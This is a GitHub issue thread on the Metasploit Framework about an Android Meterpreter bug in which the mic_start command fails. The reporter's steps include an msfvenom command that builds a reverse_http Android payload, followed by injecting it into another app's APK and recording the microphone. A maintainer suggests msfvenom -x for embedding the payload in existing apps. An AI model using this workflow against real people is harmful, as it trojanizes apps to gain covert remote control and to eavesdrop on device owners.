### ISSUE TITLE
Android payload for the latest metasploit-payloads

### ISSUE THREAD

**Issue by sdevn** [rapid7/metasploit-framework#10587]
## The problem 
I cannot use some methods / functions of the latest metasploit-payloads for android, even if i am using the latest metasploit-framework cloned from github and using the master branch 

## Steps to reproduce
1. Creating the apk with `./msfvenom -p android/meterpreter/reverse_http LHOST=xxx LPORT=yyy -o mete.apk`
2. Using `apktool` to decode the `mete.apk` to smali
3. Injecting the smali to target apk (and changing the AndroidManifest.xml)
4. Installing and running the application 
5. Establishing a meterpreter session
6. Running `record_mic` for this session (works)
7. Running `mic_start` and getting error "[-] Unknown command: mic_start"
8. (or even try to run a script with `run myscript.rb` with contents:
```
client.mic.mic_list.each_with_index do |name, indx|
  print_line("#{indx + 1}: #{name}")
end
```

I've tried it in couple of devices and on debug mode, the logcat says that the command is unregistered (or something like that which probably means it has an older version of the metasploit-payloads)

### Metasploit version

Latest github commit cb026f9f823afa16edbc7dad1515fc3f05461105

### I installed Metasploit with:

- Source install (ruby 2.5.1)

### OS

Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-48-generic x86_64)

**Comment by timwr** [comment]
Sorry for the confusion. `mic_start` isn't (and never was) implemented on Android. I'm not sure why the command is visible there but I'll try get it hidden (until it's implemented).

**Comment by timwr** [comment]
Unrelated: Is there a reason you're not using `msfvenom -x existing.apk` to insert the payload into the existing APK?

**Comment by sdevn** [comment]
I think i got confused by [this](https://github.com/rapid7/metasploit-payloads/commit/42346a1ac18fea6b2317f0a328867da550497a9b). The reason that i'm not using `msfvenom -x existing.apk` is because the target app may **not** have an entry-point activity (`android.intent.action.MAIN`), it's a launcher/keyboard/etc

**Comment by timwr** [comment]
Interesting many thanks. If you're able to share the APK (or preferably APK source) then we can look into supporting it as an injection target.

**Comment by sdevn** [comment]
Where and how can i upload an APK example?
